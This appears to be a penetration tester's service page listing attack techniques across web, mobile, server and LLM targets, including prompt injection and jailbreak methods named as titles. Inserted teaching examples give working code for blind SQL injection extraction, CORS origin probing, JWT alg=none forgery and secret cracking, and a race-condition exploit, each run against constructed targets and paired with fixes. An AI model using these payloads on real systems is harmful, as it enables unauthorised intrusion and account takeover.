Offensive Security Services

Full Application Penetration Testing

Websites & Web Apps  ·  Mobile Apps — Android & iOS

I don't run automated scans and call it a pentest. I operate as a real attacker — manually hunting logic flaws, chained vulnerabilities and business-critical weaknesses that scanners will never find.

Request a Pentest  ·  Read My Writeups

Scope of Testing

What I Test

Two engagement types — choose one or combine both for a complete product security assessment.

01

Website & Web Application Pentest

Manual black-box and grey-box testing of corporate websites, SaaS platforms and complex web applications. I map the full attack surface — every endpoint, form, auth flow and business logic path — and exploit vulnerabilities that require a human attacker to find.

Corporate Sites  ·  Web Apps  ·  Black-Box  ·  Grey-Box  ·  Authenticated

02

Mobile App Pentest — Android & iOS

Full security assessment of Android and iOS applications — static analysis of the APK/IPA, dynamic testing with Burp Suite traffic interception, insecure storage checks, certificate pinning bypass, reverse engineering and a deep dive into every backend API call the app makes.

Android  ·  iOS  ·  Static Analysis  ·  Dynamic Testing  ·  Reverse Engineering

Attack Coverage

What I Hunt For

Every attack listed is a technique I have studied, practised and documented in hands-on labs — not a checklist copied from OWASP.

Authentication Vulnerabilities

  • User Enumeration — Finding Valid Usernames
  • Brute Force & Bypassing Protections
  • Two-Factor Authentication Flaws
  • Persistent Cookie Attacks
  • Password Reset Vulnerabilities
  • Password Change Endpoint Abuse

SQL & NoSQL Injection

  • Blind SQLi — Boolean-Based Data Extraction
  • Blind SQLi — Time-Based Extraction
  • Out-of-Band SQLi — DNS Exfiltration
  • Second-Order (Stored) SQL Injection
  • Injection in Non-Obvious Points
  • Filter Bypass — Comments, Encoding, Whitespace
  • Stacked Queries & Batched Statements
  • File Read & Write via SQL
  • NoSQL — MongoDB Operator Injection
  • NoSQL — JavaScript Injection via $where
  • NoSQL — Projection Manipulation
  • NoSQL — Regex Timing Attack via $regex
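Boolean-based blind extraction in miniature, as an added example that is not part of the original page. The target is a constructed in-memory SQLite login lookup with sample rows; the attacker's only feedback is whether the row still matches, and one character is recovered per position from that single bit. The parameterised version of the same lookup sits beside it so the fix is visible. Usernames, passwords and table layout are made up for the example.

```python
import sqlite3
import string

# Constructed target: a login lookup backed by an in-memory SQLite database
# with sample rows. Nothing here comes from a real engagement.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret!Pw"), ("alice", "wonderland")])
    return con

def vulnerable_lookup(con, username):
    # Vulnerable: the attacker-controlled value is spliced into the query text.
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return con.execute(sql).fetchone() is not None

def safe_lookup(con, username):
    # Hardened: a bound parameter can only ever be data, never query syntax.
    sql = "SELECT 1 FROM users WHERE username = ?"
    return con.execute(sql, (username,)).fetchone() is not None

CHARSET = string.ascii_letters + string.digits + string.punctuation

def extract_password(oracle, target_user="admin", max_len=40):
    """Boolean-based blind extraction.

    `oracle(value)` is the only feedback channel: True when the injected
    condition holds (the row still matches), False otherwise. Each question
    leaks one bit, so the attack is slow but needs no visible output at all.
    """
    # Step 1: learn the length so the loop below knows when to stop.
    length = next((n for n in range(1, max_len + 1)
                   if oracle(f"{target_user}' AND length(password)={n}-- ")), None)
    if length is None:
        return None          # condition never held: no injection, or wrong user
    # Step 2: recover one character per position with substr() comparisons.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            literal = ch.replace("'", "''")
            if oracle(f"{target_user}' AND substr(password,{pos},1)='{literal}'-- "):
                recovered += ch
                break
        else:
            recovered += "?"  # character outside CHARSET
    return recovered

if __name__ == "__main__":
    con = build_db()
    print("tautology bypass:", vulnerable_lookup(con, "admin' OR '1'='1"))
    print("extracted via blind oracle:", extract_password(lambda v: vulnerable_lookup(con, v)))
    print("same attack against the parameterised query:",
          extract_password(lambda v: safe_lookup(con, v)))
```

The linear scan over CHARSET is the simplest form; in practice a binary search over unicode(substr(...)) cuts the request count per character from dozens to about seven, and the time-based variant (L51) swaps the row-match oracle for a measured delay when the response body gives nothing away.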

XSS Advanced

  • DOM XSS — Sources, Sinks & Exploitation
  • DOM XSS via jQuery Selector Injection
  • Stored XSS in Unusual Injection Contexts
  • XSS via SVG File Upload
  • XSS in XML/SVG with CDATA Bypass
  • Mutation XSS (mXSS)
  • CSP Bypass — Nonce Reflected in Page
  • CSP Bypass via JSONP on Whitelisted Domain
  • CSP Bypass via Open Redirect on Whitelisted Domain
  • XSS to Account Takeover Chain
  • Dangling Markup Injection

CSRF Attacks

  • CSRF Token Not Validated Server-Side
  • CSRF Token Not Tied to Session
  • CSRF via URL — GET-Based State Changes
  • SameSite=Lax Bypass via Top-Level Navigation
  • SameSite=Strict Bypass via Sibling Subdomain XSS
  • SameSite=None + Secure — Exploit Surface
  • Content-Type Bypass for JSON Endpoints
  • Referer Validation Bypass
  • Multi-Step CSRF
  • CSRF Chained with Clickjacking

CORS Attacks

  • Origin Reflection — Server Mirrors the Origin Header
  • Null Origin Exploit — Sandboxed Iframe
  • Subdomain Wildcard Regex Bypass
  • Subdomain Takeover + CORS Chain
  • Trusting HTTP Origins on an HTTPS Site
  • Pre-flight Bypass — Simple Requests
  • CORS with Credentials — Full Account Data Theft PoC
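The CORS checks above, condensed into one audit routine. This is an added example and not code from the original page: it generates the probe origins a tester sends (arbitrary, null, suffix, unescaped-dot and HTTP downgrade), classifies whatever comes back, and runs them against two constructed back-ends, one with a typical sloppy regex allowlist and one with an exact-match allowlist. Host names, the regex and both servers are invented for the example; against a live target the `server` callable would be replaced by a function that performs the real request and returns its response headers.

```python
import re
from urllib.parse import urlsplit

# Origins worth sending in the Origin header against `site`. Each key names the
# misconfiguration that would have to exist for that origin to be echoed back.
def probe_origins(site):
    host = urlsplit(site).hostname
    return {
        "arbitrary": "https://attacker.example",        # blanket origin reflection
        "null": "null",                                 # sandboxed iframe / data: URL
        "suffix": f"https://{host}.attacker.example",   # regex with no terminal anchor
        "dot": f"https://{host.replace('.', 'X', 1)}",  # unescaped dot in the regex
        "http": f"http://{host}",                       # HTTP origin trusted by an HTTPS site
    }

def classify(label, origin_sent, headers):
    """Turn one probe's response headers into a finding string, or None."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").strip().lower() == "true"
    # A literal "*" is never a credentialed read in any browser, and a value
    # other than the origin we sent means our probe was not reflected.
    if acao is None or acao == "*" or acao != origin_sent:
        return None
    names = {
        "arbitrary": "origin reflection",
        "null": "null origin trusted",
        "suffix": "unanchored origin regex (suffix bypass)",
        "dot": "unescaped dot in origin regex",
        "http": "HTTP origin trusted on an HTTPS site",
    }
    impact = ("with credentials: authenticated responses readable cross-origin"
              if creds else "without credentials: only unauthenticated data exposed")
    return f"{names[label]} {impact}"

# Constructed back-ends. The vulnerable one mirrors a common pattern: a regex
# allowlist with an unescaped dot, no terminal anchor, optional TLS, an
# explicit exception for "null", and credentials enabled for everything it allows.
VULN_ALLOW = re.compile(r"^https?://app.example.com")

def vulnerable_server(origin):
    if origin == "null" or VULN_ALLOW.match(origin):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}

HARDENED_ALLOW = {"https://app.example.com", "https://admin.example.com"}

def hardened_server(origin):
    # Exact-match allowlist, HTTPS only, and Vary: Origin so a shared cache
    # never serves one origin's ACAO header to a request from another.
    if origin in HARDENED_ALLOW:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}

def audit(site, server):
    """Send every probe origin and collect the reflected ones as findings."""
    findings = {}
    for label, origin in probe_origins(site).items():
        finding = classify(label, origin, server(origin))
        if finding:
            findings[label] = finding
    return findings

if __name__ == "__main__":
    for name, srv in (("vulnerable", vulnerable_server), ("hardened", hardened_server)):
        print(name, audit("https://app.example.com", srv))
```

Only the reflections that come back with Allow-Credentials: true are account-theft material; a reflected origin without credentials is worth a note, not a critical, and the PoC for the credentialed case is a cross-origin fetch with credentials: "include" from a page on the reflected origin.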

SSRF Attacks

  • Internal Network Scanning via SSRF
  • Cloud Metadata Exploitation (AWS/GCP/Azure)
  • SSRF Filter Bypass Techniques
  • Blind SSRF — Out-of-Band Detection
  • Blind SSRF via Referer Header
  • SSRF via URL in XML / JSON Body
  • SSRF to RCE — Hitting Internal Admin Interfaces
  • SSRF to Read Local Files via file://
  • SSRF in PDF / HTML Rendering Engines

JWT Attacks

  • Algorithm Confusion — RS256 → HS256
  • Algorithm None — Unsigned Tokens
  • Weak HMAC Secret — Brute Force
  • JWK Header Injection — Self-Signed Key
  • JKU Header Injection — Attacker-Controlled JWKS
  • kid Parameter Path Traversal
  • kid SQL Injection
  • Embedded JWK Bypass
  • Symmetric vs Asymmetric Algorithm Confusion
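Two of the JWT attacks above, alg=none and a weak HMAC secret, worked end to end, together with the verifier fix that closes them. This is an added example, not code from the original page: a minimal HS256 signer, a verifier that trusts the token's own alg header, a verifier that pins the algorithm server-side, an alg=none forgery and an offline dictionary attack on a captured token. The secret, claims and wordlist are constructed. Algorithm confusion (RS256 to HS256) is not built here because it needs RSA key handling, but it shares the same root cause and the same fix: the server, never the token, decides which algorithm and which key are used.

```python
import base64
import hashlib
import hmac
import json

def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())

def sign_hs256(payload: dict, secret: bytes) -> str:
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def vulnerable_verify(token: str, secret: bytes) -> dict:
    """Lets the token choose its own algorithm, including 'none'."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))             # no signature checked at all
    if alg == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    raise ValueError("invalid token")

def hardened_verify(token: str, secret: bytes) -> dict:
    """Pins the algorithm server-side; the header is checked, never trusted."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))

def forge_alg_none(token: str, new_claims: dict) -> str:
    """alg=none attack: rewrite the claims, set alg to none, drop the signature."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    header["alg"] = "none"
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    return encode_part(header) + "." + encode_part(payload) + "."

def crack_hs256(token: str, wordlist):
    """Offline dictionary attack on the HMAC secret behind a captured token."""
    h, p, s = token.split(".")
    sig = b64url_decode(s)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, sig):
            return candidate
    return None

if __name__ == "__main__":
    secret = b"secret123"                          # constructed weak secret
    token = sign_hs256({"sub": "alice", "role": "user"}, secret)
    forged = forge_alg_none(token, {"role": "admin"})
    print("vulnerable verifier accepts alg=none:", vulnerable_verify(forged, secret))
    try:
        hardened_verify(forged, secret)
    except ValueError as e:
        print("hardened verifier rejects it:", e)
    print("secret recovered offline:", crack_hs256(token, ["password", "changeme", "secret123"]))
```

Real libraries that accepted "none" often also accepted case variants such as "None" or "NONE", so a tester tries all of them; and a cracked secret is worse than the alg=none bypass because it lets the attacker mint tokens that even the hardened verifier accepts, which is why HMAC secrets for JWTs need to be long random values rather than passwords.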

XXE Attacks

  • Classic XXE — Local File Read
  • XXE SSRF — Internal HTTP Requests
  • Blind XXE — Out-of-Band via DNS
  • Blind XXE — Data Exfiltration via External DTD
  • Error-Based XXE
  • XXE via XInclude
  • XXE via File Upload
  • XXE via XSLT Processing
  • XXE via Modified Content-Type
  • XXE Filter Bypass Techniques

Insecure Deserialization

  • PHP Magic Methods & POP Chain Construction
  • PHP Property Injection via Serialized Objects
  • Java Deserialization — readObject & Gadget Chains
  • Identifying Java Serialized Data in HTTP Traffic
  • Python Pickle RCE via __reduce__
  • .NET ViewState — Decoding, Tampering & MAC Bypass
  • Ruby Marshal Gadget Chains
  • Node.js node-serialize — IIFE RCE

Web Cache Attacks

  • Identifying Cache Keys
  • Unkeyed Header — X-Forwarded-Host Poisoning
  • Unkeyed Port & Protocol Poisoning
  • Fat GET — Body Parameters Ignored by the Cache Key
  • Cache Poisoning via DOM-Based XSS
  • Parameter Cloaking
  • Cache Key Normalization Tricks
  • Cache Deception — Path Confusion
  • Path Delimiter Confusion
  • Cache Deception via Path Normalization Differences
  • Cookie-Based Cache Deception

HTTP Host Header & Request Smuggling

  • Host Header — Password Reset Poisoning
  • Host Header — Web Cache Poisoning
  • Host Header — Routing-Based SSRF
  • SSRF via X-Forwarded-Host, X-Host, X-Forwarded-Server
  • Request Smuggling — CL.TE
  • Request Smuggling — TE.CL
  • Smuggling to Bypass Front-End Access Controls
  • Smuggling to Capture Another User's Request
  • HTTP/2 Desync — H2.CL and H2.TE

File Upload & Path Traversal

  • Extension Bypass Techniques
  • Content-Type Bypass
  • Magic Bytes Spoofing
  • Polyglot Files — Valid JPEG & Valid PHP
  • Upload to Web Root via Filename Traversal
  • Server-Side Processing Exploits — ImageTragick & FFmpeg SSRF
  • Path Traversal — Encoded Sequences
  • Absolute Path Bypass
  • Extension Restriction Bypass — Null Byte & Required Suffix
  • Zip Slip — Malicious Archive Path Traversal

WebSockets Security

  • Handshake Interception with Burp Suite
  • Cross-Site WebSocket Hijacking (CSWSH)
  • WebSocket SSRF
  • Message Injection — SQLi, XSS, Command Injection
  • Broken WebSocket Authentication
  • WS Token Hijacking via CORS Misconfiguration
  • Message Replay & Manipulation via Burp
  • WS to HTTP Tunneling
  • Lack of Rate Limiting — Brute Force via WebSocket
  • WebSockets and SameSite Cookies

Race Conditions

  • Limit Overrun — Coupon & Discount Reuse
  • Limit Overrun — 2FA OTP Brute Force
  • Single-Packet Attack (HTTP/2)
  • Last-Byte Synchronisation (HTTP/1.1 — Turbo Intruder)
  • Partial Construction Race — Account Creation Window
  • Time-of-Check to Time-of-Use (TOCTOU)
  • Database-Level Races — Concurrent Transactions
  • Session Token Race — Multiple Valid Reset Tokens
  • Detection with Turbo Intruder
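The server side of a limit overrun, as an added example that is not part of the original page. A constructed single-use coupon is implemented twice: a check-then-act version with a window between the check and the decrement (the TOCTOU pattern), and a version that holds one lock across both steps. The threading.Barrier in the gap plays the role that the single-packet attack or last-byte synchronisation plays on the wire: it lands every request inside the window at the same instant, so the result is deterministic rather than luck. The coupon store and request count are made up.

```python
import threading

class CouponStore:
    """Constructed single-use coupon. atomic=False is the vulnerable
    check-then-act implementation; atomic=True holds one lock across both
    steps so no other request can slip between the check and the update."""

    def __init__(self, atomic):
        self.atomic = atomic
        self.uses_left = 1
        self._lock = threading.Lock()

    def redeem(self, gap=lambda: None):
        # `gap` stands in for whatever a real handler does between the check
        # and the update: another DB round-trip, an email, a template render.
        if self.atomic:
            gap()                              # the window still exists, but ...
            with self._lock:                   # ... check and update are one unit
                if self.uses_left > 0:
                    self.uses_left -= 1
                    return True
                return False
        if self.uses_left > 0:                 # time of check
            gap()                              # race window
            self.uses_left -= 1                # time of use
            return True
        return False

def race(store, n_requests=10):
    """Fire n_requests in parallel, arranged so that all of them reach the same
    point before any is allowed to continue. The Barrier removes network jitter
    the way the single-packet attack (HTTP/2) or last-byte synchronisation
    (HTTP/1.1) does, so every request sits inside the window together."""
    barrier = threading.Barrier(n_requests, timeout=5)
    results = []

    def request():
        results.append(store.redeem(gap=barrier.wait))

    threads = [threading.Thread(target=request) for _ in range(n_requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)    # how many requests were granted the one-use discount

if __name__ == "__main__":
    print("vulnerable store granted:", race(CouponStore(atomic=False)), "of 10")
    print("atomic store granted:   ", race(CouponStore(atomic=True)), "of 10")
```

In a real application the lock is usually the database rather than a process-local mutex: a single conditional statement such as UPDATE coupons SET uses_left = uses_left - 1 WHERE code = ? AND uses_left > 0, with the handler treating an affected-row count of zero as "already used", gives the same atomicity across many app servers, which a Python lock cannot.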

API & GraphQL Pentest

  • REST API Recon — JS Mining, Parameter Discovery, Verb Tampering
  • Mass Assignment — Injecting Unexpected Fields
  • Broken Object-Level Authorization (BOLA / IDOR)
  • Broken Function-Level Authorization
  • GraphQL Introspection — Enabled and Disabled
  • GraphQL Query Batching for Rate-Limit Bypass
  • GraphQL CSRF via GET
  • GraphQL IDOR via Mutation
  • GraphQL Deep Nesting DoS
  • JWT and API Key Leakage — JS, localStorage, URLs

Server-Side Attacks

  • Nmap — Service & Version Detection
  • Rapid7 — CVE & Module Research
  • Metasploit Framework — Core Workflow
  • Exploiting Common Services — vsftpd, Samba, SMB (EternalBlue), Tomcat
  • Meterpreter — Post-Exploitation
  • Pivoting & Port Forwarding

LLM Attacks

  • Direct Prompt Injection — Overriding the System Prompt
  • Indirect Prompt Injection — Malicious Instructions in External Content
  • Jailbreaking via Persona Assignment
  • Many-Shot Jailbreaking — Context Flooding
  • Training Data Extraction — PII, Code & Secrets
  • Insecure Tool and Plugin Use
  • Prompt Injection via RAG Pipeline Poisoning
  • Data Exfiltration via Markdown Image Rendering
  • LLM-Based SSRF
  • Chained Attack — Indirect Injection to Tool Call to Exfiltration

OAuth 2.0 Attacks

  • Authentication Bypass via Implicit Flow
  • Forced OAuth Profile Linking (CSRF)
  • OAuth Account Hijacking via redirect_uri
  • Stealing Tokens via Open Redirect
  • SSRF via OpenID Dynamic Client Registration

Access Control & IDOR

  • Horizontal Privilege Escalation (IDOR)
  • Vertical Privilege Escalation
  • URL-Based Access Control Bypass
  • Referer-Based Access Control Bypass
  • Multi-Step Process Access Control Bypass

Business Logic Vulnerabilities

  • Price & Discount Manipulation
  • Workflow State Bypass
  • Logic Flaws in Multi-Step Processes
  • Trust Boundary Violations
  • Inconsistent Input Validation

OS Command Injection

  • Blind OS Command Injection via Time Delay
  • Blind OS Command Injection via Out-of-Band (DNS)
  • OS Command Injection — Output Redirection
  • In-Band OS Command Injection

Server-Side Template Injection (SSTI)

  • Template Engine Detection (Jinja2, Twig, Freemarker)
  • Basic SSTI Payload Execution
  • SSTI to Remote Code Execution (RCE)
  • Sandbox Escape via Object Traversal
  • SSTI in Document Generation (PDF, Email)

Prototype Pollution

  • Client-Side Prototype Pollution via Query String
  • Client-Side Prototype Pollution via URL Fragment
  • Prototype Pollution via JSON Input
  • Prototype Pollution to XSS
  • Server-Side Prototype Pollution

DOM-Based Vulnerabilities

  • DOM XSS via Web Messages (postMessage)
  • DOM XSS via Web Messages and JavaScript URL
  • DOM XSS via Web Messages and JSON.parse
  • DOM-Based Open Redirection
  • DOM-Based Cookie Manipulation
  • DOM Clobbering to Enable XSS
  • DOM Clobbering — Bypass HTML Filters (DOMPurify)

Clickjacking

  • Basic Clickjacking
  • Clickjacking with Prefilled Form Input
  • Frame Buster Bypass via Sandbox Attribute
  • Clickjacking to Trigger DOM-Based XSS
  • Multistep Clickjacking

Information Disclosure

  • Information Disclosure in Error Messages
  • Debug Page Information Disclosure
  • Source Code Disclosure via Backup Files
  • Authentication Bypass via HTTP TRACE
  • Version Control History (.git Exposure)

Process

How I Work

A structured adversarial methodology from initial scoping to final remediation guidance.

Scoping & Threat Modelling

Define the attack surface, agree on targets, test accounts and rules of engagement. Build the threat model before touching anything.

Reconnaissance

Map endpoints, parameters, auth flows, third-party integrations and business logic paths. Passive and active recon before exploitation.

Manual Exploitation

Hands-on, manual attack chains — no automated scan reports. I go deep on logic-level vulnerabilities and chained exploits that carry real business risk.

Impact Demonstration

Every finding is proven with a working proof-of-concept. I show what an attacker can actually do, not just flag a theoretical risk.

Reporting

Full written report: executive summary, technical details, CVSS severity ratings, PoC screenshots, and a prioritised remediation roadmap.

Remediation Support

I stay available after delivery to answer developer questions, review fixes, and confirm patches have closed the vulnerabilities found.


Credentials & Experience

Why Trust Me With Your Product

I don't just study security — I practice it every day across bug bounty programs, CTF competitions and real-world engagements.

7+
Years building full-stack applications — I understand how software is architected, which makes me a better attacker.
20+
Vulnerabilities discovered across bug bounty programs and real-world application assessments.
CRTP
Certified Red Team Professional — 24-hour hands-on exam. Internationally recognised offensive security certification.
Daily.
Active practice — CTF competitions, bug bounty hunting and web application pentesting labs, every single day.

What You Get

Deliverables

Every engagement ends with clear, actionable documentation — not a raw scanner dump.

Require a Full Pentest on Your Product?

Tell me about your application — scope, tech stack and what you need tested. I'll get back to you within 24 hours with a clear proposal.
